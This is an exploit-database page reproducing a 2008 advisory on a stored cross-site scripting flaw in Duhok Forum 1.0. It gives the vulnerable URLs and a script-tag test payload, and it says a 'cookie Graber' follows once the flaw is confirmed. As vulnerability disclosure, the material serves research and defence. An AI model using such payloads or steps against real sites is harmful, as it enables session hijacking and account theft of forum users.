header-logo
Suggest Exploit
vendor:
Duhok Forum
by:
indoushka
7,5
CVSS
HIGH
Cross Site Scripting
79
CWE
Product Name: Duhok Forum
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:duhok_forum:duhok_forum:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2008

Duhok Forum 1.0 script Cross Site Scripting Vulnerability

Duhok Forum 1.0 is vulnerable to Cross Site Scripting (XSS). An attacker can inject malicious JavaScript code into the 'Approval' parameter of the 'index.php' script when registering a new user. This malicious code will be executed in the browser of the victim when the vulnerable page is accessed.

Mitigation:

Input validation should be used to prevent XSS attacks.
Source

Exploit-DB raw data:

========================================================================================
| # Title    : Duhok Forum 1.0 script Cross Site Scripting Vulnerability
| # Author   : indoushka
| # email    : indoushka@hotmail.com
| # Home     : www.iq-ty.com                                                                                                               $
| # Dork     : ��� ������ ������ ������ duhokFrm 1.0                                                                                       $
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)
| # Bug      : XSS
======================      Exploit By indoushka       =================================
 # Exploit  :

 1 - http://127.0.0.1/st/index.php?mode=register&Approval=1 (1 register in to the web site)

 2 - http://127.0.0.1/st/index.php?mode=editor&method=topic&f=1&c=1 (2 past a new post )

Put this code 4 virified is infected or not <ScRiPt>alert(213771818860)</ScRiPt> a test post

 3- if it infected post a new post and use cookie Graber

Dz-Ghost Team ===== Saoucha * Star08 * Redda * n2n * XproratiX ==========================================
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net
www.alkrsan.net * www.kadmiwe.net * www.arhack.net
---------------------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR